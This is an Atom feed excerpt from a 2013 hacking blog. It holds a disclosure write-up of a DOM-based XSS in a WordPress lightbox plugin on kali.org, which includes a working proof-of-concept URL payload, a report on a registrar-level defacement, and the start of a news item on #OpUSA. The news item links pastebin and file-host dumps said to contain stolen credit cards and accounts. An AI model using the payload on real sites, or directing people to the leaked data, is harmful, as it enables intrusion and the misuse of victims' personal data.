<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;DEACQng4cCp7ImA9WhBaFE0.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062</id><updated>2013-05-24T07:46:03.638-07:00</updated><category term="Youtube hacks" /><category term="Registry hacks" /><category term="Security Training" /><category term="Security flaws" /><category term="Unix Hacking" /><category term="Footprinting" /><category term="Orkut hacking" /><category term="Duqu" /><category term="Wordpress Security" /><category term="contests" /><category term="Xp tricks" /><category term="VOIP Hacking" /><category term="Google hacks" /><category term="iPhone Hacking" /><category term="Hack Facebook" /><category term="Hacking News" /><category term="My space hacks" /><category term="Website hacking" /><category term="Backtrack 5" /><category term="Computer hacking" /><category term="sql injection" /><category term="Sponsored Reivews" /><category term="Skype" /><category term="PTC Hacking" /><category term="Themes" /><category term="OWASP" /><category term="Network Security" /><category term="bug bounty" /><category term="Parental Control softwares" /><category term="Hardware keyloggers" /><category term="Joomla Security" /><category term="Password Hacking softwares" /><category term="USB Hacking" /><category term="Interviews" /><category term="Cheat and tricks" /><category term="Security Tools" /><category term="Wireless Security" /><category term="Blogging tips" /><category term="Hotmail hacks" /><category term="Russian Crimewares" /><category term="xss" /><category term="swf vulnerabilities" /><category term="Intermediate Hacking" /><category term="Whitepapers" /><category term="DOM XSS" /><category term="facebook" /><category term="Email hacking" /><category term="Msn hacks" /><category term="botnets" /><category term="Counter Strike Cheats" /><category term="Rafay Baloch Books" /><category term="Others" /><category term="Twitter hacks" /><category term="videos" /><category term="Metasploit" /><category term="Ip address" /><category term="Stuxnet" /><category term="Password Cracking" /><category term="Password recovery" /><category term="Gmail hacks" /><category term="Hack Yahoo" /><category term="Windows 7 hacks" /><category term="Rapidshare hacks" /><category term="Hacking Tools" /><category term="Windows performance tips" /><category term="android" /><category term="Hacking basics" /><category term="Hi5 hacks" /><category term="Webserver Security" /><category term="Hacking Windows" /><category term="Security tips" /><category term="Telecom Hacking" /><category term="Anonymous web surfing" /><category term="Orkut tricks" /><category term="Data Recovery" /><category term="Capture The Flag" /><category term="Reverse Engineering" /><category term="Cracks and Keygens" /><category term="Cellphone hacks" /><category term="Reverting" /><category term="Viruses" /><category term="Data Hiding" /><category term="Browser Exploitation" /><title type="text">Ethical Hacking - Rafayhackingarticles</title><subtitle type="html">Learn How to hack!Get hacking and security tips from expert,Protect yourself from hackers</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://www.rafayhackingarticles.net/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>498</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/HackingAndCracking" /><feedburner:info uri="hackingandcracking" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><link rel="license" type="text/html" href="http://creativecommons.org/licenses/by/3.0/" /><logo>http://2.bp.blogspot.com/_fMrF3L8CTmg/S-RW1j1FO1I/AAAAAAAAAbA/0fqDhYt8DLM/S700/RafayHackingarticles+logo.JPG</logo><feedburner:emailServiceId>HackingAndCracking</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><entry gd:etag="W/&quot;A0ICQHw6eip7ImA9WhBaEEk.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-6363356159726651942</id><published>2013-05-20T01:32:00.000-07:00</published><updated>2013-05-20T04:32:41.212-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-20T04:32:41.212-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DOM XSS" /><title>Kali Linux DOM Based XSS Writeup</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-928dUYxVrmw/UZb9zLukuyI/AAAAAAAAC2o/nOjXSwP1448/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="302" src="http://1.bp.blogspot.com/-928dUYxVrmw/UZb9zLukuyI/AAAAAAAAC2o/nOjXSwP1448/s400/images.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Recently, I have been on a mission to find XSS in popular security training websites, Since these are the ones who care about their security the most. I have been&amp;nbsp;successful&amp;nbsp;in finding in almost all of them i have tried up to date, This one was a bit interesting to i thought to write a post on it, Basically it was not a reflected/stored xss, however it was a DOM based XSS, similar to the one i found in &lt;a href="http://www.rafayhackingarticles.net/2013/03/dom-based-xss-in-microsoft.html" target="_blank"&gt;Microsoft&lt;/a&gt;. Unlike others, this particular XSS occurs in client side javascript.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
In order to provide features to the users lots of webmasters/Vendors are moving their code towards client side, the data is embedded in the DOM and before it's reflected back to the user it is not filtered out, which results in a DOM based XSS. The main cause of this&amp;nbsp;vulnerabilities are dangerous Sinks. &lt;a href="https://code.google.com/p/domxsswiki/" rel="nofollow" target="_blank"&gt;DOM based XSS wiki &lt;/a&gt;is a good source where you would find dangerous sources and sinks.&lt;br /&gt;
&lt;br /&gt;
On checking out the source of kali.org, i immediately found out that i was running &lt;b&gt;wordpress version 3.5.1&lt;/b&gt;, The version is the latest version of the wordpress and has no known public vulnerabilities till date, therefore i moved towards testing plugins.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-FKSGADUsUdM/UZb3yFGCWVI/AAAAAAAAC1c/xbf-8pl_nUc/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="308" src="http://4.bp.blogspot.com/-FKSGADUsUdM/UZb3yFGCWVI/AAAAAAAAC1c/xbf-8pl_nUc/s640/1.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I tested couple of plugins, however did not find any one of them vulnerable, by analyzing the source more deeply i found a pretty interesting plugin &lt;b&gt;"WP-Pretty Photo" &lt;/b&gt;which caught my interest. Which is a jquery based lightbox for wordpress platform.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-iAgupd-dfpI/UZb4jB9qE3I/AAAAAAAAC1o/23-q1R4ZMUY/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="316" src="http://1.bp.blogspot.com/-iAgupd-dfpI/UZb4jB9qE3I/AAAAAAAAC1o/23-q1R4ZMUY/s640/2.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
While, searching for common vulnerabilities for wp-prettyphoto plugin i found that it was vulnerable to DOM Based XSS. So, i quickly added my payload to the url and bamn it triggered an XSS.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-t6ijpoxAGVc/UZb6fXOFO-I/AAAAAAAAC14/MgDzjKN3deA/s1600/rafay.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="248" src="http://4.bp.blogspot.com/-t6ijpoxAGVc/UZb6fXOFO-I/AAAAAAAAC14/MgDzjKN3deA/s640/rafay.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;POC:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;&lt;i&gt;http://www.kali.org/#!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Some debugging with chrome JS console, led me to the &lt;b&gt;line 79 &lt;/b&gt;of the &lt;b&gt;jquery.prettyPhoto.js&lt;/b&gt;, the line of code which was responsible for the cause of the DOM Based XSS.&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;
&lt;i&gt;&lt;b&gt;http://www.kali.org/wp-content/themes/persuasion/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=2.1&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-7jYKrh3F16Y/UZb72qMEedI/AAAAAAAAC2I/b8549Pvd3W0/s1600/untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://3.bp.blogspot.com/-7jYKrh3F16Y/UZb72qMEedI/AAAAAAAAC2I/b8549Pvd3W0/s640/untitled.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
It was also obvious from the code that it required us ! sign to&amp;nbsp;successfully&amp;nbsp;execute the javascript.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-ynxKeKCFHag/UZb8vahQQwI/AAAAAAAAC2Y/VPsycfcElVI/s1600/new.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="260" src="http://1.bp.blogspot.com/-ynxKeKCFHag/UZb8vahQQwI/AAAAAAAAC2Y/VPsycfcElVI/s640/new.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The input inside the hashrel was not filtered out before it was being displayed to the user, which resulted in the DOM Based XSS.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;The Fix&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The following url discusses, about the fix:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc" rel="nofollow" target="_blank"&gt;https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
If, this was not enough for you, then listen to this, Offensive-security team was very awesome in a sense, that they gave me a free voucher for their famous certification PWB 3.0.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-Hrc0f9gekbY/UZb_hKZ2G0I/AAAAAAAAC24/A2eFwuTa4xY/s1600/268818_10151517350038001_194305879_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="328" src="http://2.bp.blogspot.com/-Hrc0f9gekbY/UZb_hKZ2G0I/AAAAAAAAC24/A2eFwuTa4xY/s640/268818_10151517350038001_194305879_n.jpg" width="577" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;
I was really surprised to see that Dominator was not detecting it which is the only good tool for finding DOM Based XSS leaving IBM javascript scan apart, in past i have tried dominator against various websites suffering from DOM Based XSS and have found that, at some spots it's very good and at some spots it needs much improvement. Here is the screenshot:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-XkjeWw5rlYw/UZfNCyqiU6I/AAAAAAAAC3Y/cwBoWewUl4k/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="402" src="http://3.bp.blogspot.com/-XkjeWw5rlYw/UZfNCyqiU6I/AAAAAAAAC3Y/cwBoWewUl4k/s640/Untitled.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
I would like that every one would be act the same way i did and responsibly disclose every issue you find.&amp;nbsp;&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=gsyND3u87gI:_FPaGDox7P0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=gsyND3u87gI:_FPaGDox7P0:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=gsyND3u87gI:_FPaGDox7P0:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=gsyND3u87gI:_FPaGDox7P0:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=gsyND3u87gI:_FPaGDox7P0:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=gsyND3u87gI:_FPaGDox7P0:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=gsyND3u87gI:_FPaGDox7P0:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=gsyND3u87gI:_FPaGDox7P0:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=gsyND3u87gI:_FPaGDox7P0:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=gsyND3u87gI:_FPaGDox7P0:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=gsyND3u87gI:_FPaGDox7P0:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/gsyND3u87gI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/6363356159726651942/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/05/kali-linux-dom-based-xss-writeup.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6363356159726651942?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6363356159726651942?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/gsyND3u87gI/kali-linux-dom-based-xss-writeup.html" title="Kali Linux DOM Based XSS Writeup" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-928dUYxVrmw/UZb9zLukuyI/AAAAAAAAC2o/nOjXSwP1448/s72-c/images.jpg" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/05/kali-linux-dom-based-xss-writeup.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0QCRXY4fCp7ImA9WhBbF04.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-9121876146837189017</id><published>2013-05-16T13:16:00.001-07:00</published><updated>2013-05-16T13:16:04.834-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-16T13:16:04.834-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News" /><title>How Was 133day.com Hacked?</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Today, in the morning when i browsed to &lt;b&gt;1337day.com&lt;/b&gt; (The famous exploit buying/selling database), I was shocked to see 1337day defaced by famous turkish hacker group named &lt;b&gt;"Turkguvenligi"&lt;/b&gt;, In past&amp;nbsp;Turkguvenligi has been responsible for defacements of lots of famous websites. Here is what appeared when i came across 1337day.com&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-27Qk6dRrW7o/UZU2wtuqkOI/AAAAAAAAC0I/434o8NsW8r4/s1600/BKVvp5ICEAEb4-x+(1).png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="334" src="http://3.bp.blogspot.com/-27Qk6dRrW7o/UZU2wtuqkOI/AAAAAAAAC0I/434o8NsW8r4/s640/BKVvp5ICEAEb4-x+(1).png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;On their defacement page, they told that they had asked 1337day to ban a fake user with author id =5819 but they refused to do so, As i browsed to&amp;nbsp;&lt;b&gt;http://www.1337day.com/author/5819&lt;/b&gt;, i website was first appeared to be inaccessible, later it showed the following message:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-EGDqX6O5S5I/UZU4sN0RrnI/AAAAAAAAC0Y/0AhybVvxy7k/s1600/Untitled1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="162" src="http://2.bp.blogspot.com/-EGDqX6O5S5I/UZU4sN0RrnI/AAAAAAAAC0Y/0AhybVvxy7k/s640/Untitled1.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
However, i used their mirror site 1337day.org to access the author link, Here is the screenshot:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-7vl9LQbA4fk/UZU5wRZyqnI/AAAAAAAAC0o/DMTQ0EGnFYM/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="342" src="http://2.bp.blogspot.com/-7vl9LQbA4fk/UZU5wRZyqnI/AAAAAAAAC0o/DMTQ0EGnFYM/s640/Untitled.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
By looking at the author name &lt;b&gt;"Agd_Scorp"&lt;/b&gt;, i understood the whole point of the dispute, &lt;b&gt;Agd_Scorp &lt;/b&gt;is a well known hacker and founding member of "Turkguvenligi", He is responsible for lots of high profile defacements, If you take a look at his Zone-h record, it's pretty impressive, he has history of hacking into domain registrars.&lt;br /&gt;
&lt;br /&gt;
It appears to me that some known was submitting exploits with the name of Agd_Scorp, They asked 1337day team to remove it, however they refused to remove it. Therefore they defaced their website.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;How was 1337day.com hacked?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
There have been issues in the past where 1337day, injectors etc and their mirror websites were hacked, but in all of those cases, their servers were never compromised, it was their domain registrar&amp;nbsp;Moniker.com, which got compromised by the attackers.&lt;br /&gt;
&lt;br /&gt;
The attackers, compromised moniker.com and changed their dns servers to their own dns servers, a story matching &lt;a href="http://www.rafayhackingarticles.net/2012/11/how-google-pakistan-was-hacked.html" target="_blank"&gt;Google Pakistan hack&lt;/a&gt;, The 1337day team later confirmed on their facebook that their domain registrar was the victim of their attack not their DNS servers.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-rduVQMP8xIE/UZU8oXEJxJI/AAAAAAAAC04/Y7UxdN-5DvM/s1600/1337.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="242" src="http://1.bp.blogspot.com/-rduVQMP8xIE/UZU8oXEJxJI/AAAAAAAAC04/Y7UxdN-5DvM/s640/1337.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
They have also asked webmasters not to invent stories that their server was hacked. They say it's impossible, I don't agree with them on this point. Even most secure systems can be compromised.&lt;br /&gt;
&lt;br /&gt;
On performing a WHOIS lookup, I came to know that they have actually switched their hosting account from Moniker.com to hostgator.com&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-8MLCTIqiLxw/UZU9nnLSTOI/AAAAAAAAC1M/rQUOpK8TvkQ/s1600/Untitled11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="274" src="http://4.bp.blogspot.com/-8MLCTIqiLxw/UZU9nnLSTOI/AAAAAAAAC1M/rQUOpK8TvkQ/s640/Untitled11.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I have confirmed with hostgator that the dns servers for websitewelcome belong to them. We, will update you as soon as we have more information.&amp;nbsp;&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e0ux2sEJrFc:ycmPsbQGGmc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e0ux2sEJrFc:ycmPsbQGGmc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e0ux2sEJrFc:ycmPsbQGGmc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e0ux2sEJrFc:ycmPsbQGGmc:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/e0ux2sEJrFc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/9121876146837189017/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/05/how-was-133daycom-hacked.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9121876146837189017?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9121876146837189017?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/e0ux2sEJrFc/how-was-133daycom-hacked.html" title="How Was 133day.com Hacked?" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-27Qk6dRrW7o/UZU2wtuqkOI/AAAAAAAAC0I/434o8NsW8r4/s72-c/BKVvp5ICEAEb4-x+(1).png" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/05/how-was-133daycom-hacked.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0YGQ34zfip7ImA9WhBbEEw.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-6087721875125654319</id><published>2013-05-08T04:05:00.001-07:00</published><updated>2013-05-08T04:05:22.086-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-08T04:05:22.086-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News" /><title>Anonymous Hackers Cause Significant Damage To Banking And Government Agencies</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-H4oHNguo9bQ/UYowr5qqAZI/AAAAAAAACys/qdi7yzdoo0g/s1600/967d3a1e5869cae4490e28b80ae2d53c.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-H4oHNguo9bQ/UYowr5qqAZI/AAAAAAAACys/qdi7yzdoo0g/s1600/967d3a1e5869cae4490e28b80ae2d53c.jpeg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
A collective of hacker groups planed to attack the websites of major government agencies and banks on May 7 to protest American foreign policy.&lt;br /&gt;
&lt;br /&gt;
For weeks, the groups, which include Anonymous, have used social media to publicize their planned operation, dubbed "#OpUSA."&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Experts from USA(to cover up things) say that the attack was not well-planned and focused. On the other hand, twitter is full of #OpUSA tweets which tells us a different story. The hacker groups have compromised a large number of targets which as either owned by US government or its residents.&lt;br /&gt;
&lt;br /&gt;
AnonGhost made a significant contribution to #OpUSA by taking down a large number of websites, emails, credit cards, etc. According to their pastebin post, hackers claim to hack-&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;
&lt;b&gt;&lt;i&gt;- More than 700 websites (http://pastebin.com/zftTrrrh)&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;- More than 10k American credit cards(http://pastebin.com/D4QCynHC)&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;- 1 lac email accounts which belong to US residents (http://www45.zippyshare.com/v/58998013/file.html) 4. - More than 5000 facebook accounts(http://pastebin.com/NRvmnYFe)&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;- More than 12k email accounts of USA (http://www11.zippyshare.com/v/39103082/file.html)&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The complete paste can be seen here&lt;b&gt;(http://pastebin.com/RSqKCd1N).&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
